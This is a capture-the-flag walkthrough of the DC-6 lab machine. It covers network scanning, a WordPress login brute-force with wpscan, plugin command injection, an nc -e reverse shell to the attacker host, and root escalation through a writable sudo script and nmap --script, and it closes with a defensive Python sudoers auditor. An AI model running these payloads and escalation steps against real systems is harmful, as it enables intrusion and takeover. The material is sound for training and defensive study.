1. Set up the environment
Kali acts as the attack machine. Its IP address is 192.168.200.14.
DC-6 is the target machine; its IP address is not yet known.
Note: put both machines on the same network adapter.
2. Information collection
1. Discover live hosts on the same network segment
① Method 1
arp-scan -l
② Method 2
netdiscover -i eth0 -r 192.168.200.0/24
③ Method 3
nmap -sP 192.168.200.0/24 -T4
2. Open ports
nmap -sS -A 192.168.200.7 -p 1-65535
Ports 22 and 80 are open; open the web page in a browser.
The page redirects to the hostname wordy. Add the mapping 192.168.200.7 wordy to the hosts file (/etc/hosts) on Kali.
After refreshing the page, I saw that the site uses the WordPress CMS.
The target's CMS is WordPress 5.1.1.
Given the CMS and its version, there are two approaches:
First: use a directory scanner to find the CMS admin backend, then brute-force an account and password to log in and look for exploitable functionality.
Use the Kali tool dirb to discover the backend directory:
dirb http://192.168.200.7/
Backend login interface
3. Backend brute-forcing
Next, brute-force the account password with wpscan, the WordPress scanning tool:
wpscan --url http://wordy -e u   # specify the URL and enumerate its user names
Save the enumerated user names in a new file, user.txt.
Alternatively, cewl can generate a password list from the site's content for a brute-force tool to use.
Hint
The hint says to use the rockyou.txt wordlist that ships with Kali and extract the entries containing k01 into a dictionary (unzip it first if you have not already; I had decompressed it earlier).
cat /usr/share/wordlists/rockyou.txt | grep k01 > pwd.txt
With the user list and password list ready, I started brute-forcing:
wpscan --url wordy -U user.txt -P pwd.txt
Account: mark
Password: helpdesk01
Second: search online for vulnerabilities in this version, or use tools such as searchsploit and msfconsole to find known vulnerabilities and exploits.
Log in to the backend
3. Vulnerability discovery
Two clues were found here:
First: the site uses the Activity Monitor plugin.
Second: the Tools tab of Activity Monitor has an input field that may be an injection point.
Based on these two clues, there are two approaches:
First: since the user's input is sent to the backend for processing, can the request be modified to achieve our goal? Test this by intercepting the request with Burp Suite (BP).
Second: use the vulnerability search tools mentioned above to look for known vulnerabilities in Activity Monitor.
Following the first approach, enter qquhu.com in the Tools field and click Lookup.
Intercepting the request in Burp showed that a whoami placed after a pipe character was executed, which confirms a command injection vulnerability here.
Reverse shell
Use this vulnerability to obtain a reverse shell.
First start a listener on the Kali VM:
nc -lvvp 6666
Change the submitted value in the request to: qq.com | nc -e /bin/bash 192.168.200.14 6666   # 192.168.200.14 is Kali's IP address
Execution succeeded.
Use Python to upgrade to an interactive shell by entering:
python -c 'import pty;pty.spawn("/bin/bash")'
Look through the home directories for new clues:
In mark's home directory there is a things-to-do file containing graham's account password.
I then tried to log in with graham's account and password, but the login failed. Since the target also has port 22 open, I tried logging in via SSH.
ssh graham@192.168.200.7
Privilege escalation
sudo -l   # check what the current user may run with sudo; graham can run the following without a password:
User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh
# the current user has write permission on backups.sh
cd /home/jens
echo "/bin/bash" >> backups.sh   # append /bin/bash, run the script and switch to jens' shell
sudo -u jens ./backups.sh
sudo -l   # as jens: nmap can be run as root without a password
User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
# nmap can run a script file with --script, so a script that executes a shell runs as root; write os.execute(...) to a file
echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell
Enter /home/jens and open backups.sh. It contains a compression command, which shows the script is meant to be run.
Appending /bin/bash to the file and running it with sudo gives a shell as jens.
echo '/bin/bash' >> backups.sh   # append the command to the file
sudo ./backups.sh                # fails, because the current user is graham
sudo -u jens ./backups.sh        # -u specifies the user to run as
jens can run nmap as root without a password, and nmap can execute script files.
nmap privilege escalation: write a script that opens a shell, then have nmap execute it with root permissions.
echo "os.execute('/bin/bash')" > getshell
sudo nmap --script=getshell
The flag is found in the root directory.
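Both escalation steps above rest on sudo rules a defender can audit: a NOPASSWD rule whose target script is writable by others, and a NOPASSWD rule for a binary that executes caller-supplied script files (nmap --script). The following Python script is an added example, not part of the original write-up; its sudoers lines are constructed to mirror the sudo -l output shown above, and in the demo the writable check is simulated for backups.sh so it runs offline.

```python
import os
import re
import stat

# Constructed sudoers lines reproducing the two rules the write-up saw via `sudo -l` on dc-6.
SAMPLE_SUDOERS = """\
# DC-6 style rules (constructed sample)
graham  dc-6 = (jens) NOPASSWD: /home/jens/backups.sh
jens    dc-6 = (root) NOPASSWD: /usr/bin/nmap
root    ALL = (ALL:ALL) ALL
"""

# Binaries known from this write-up to execute a caller-supplied script (nmap --script).
SCRIPT_CAPABLE = {"nmap"}

# user  host = (runas) [TAG: ...] command   (sudoers user-spec syntax)
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S+)"
)

def file_writable_by_others(path):
    """True if the file is group- or world-writable (os.stat based, for real hosts)."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_sudoers(text, writable=file_writable_by_others):
    """Return (user, runas, command, reason) for every risky NOPASSWD rule."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE_RE.match(line)
        if not m or "NOPASSWD" not in m["tags"]:
            continue
        cmd = m["cmd"]
        if cmd == "ALL":
            findings.append((m["user"], m["runas"], cmd, "NOPASSWD for ALL"))
        elif os.path.basename(cmd) in SCRIPT_CAPABLE:
            findings.append((m["user"], m["runas"], cmd, "runs caller-supplied scripts"))
        elif writable(cmd):
            findings.append((m["user"], m["runas"], cmd, "target file writable by others"))
    return findings

if __name__ == "__main__":
    # Simulated check: treat backups.sh as writable, as it was on the target.
    for finding in audit_sudoers(SAMPLE_SUDOERS, writable=lambda p: p.endswith("backups.sh")):
        print(finding)
```

On a real host, call audit_sudoers with the contents of /etc/sudoers and /etc/sudoers.d/* and the default stat-based check.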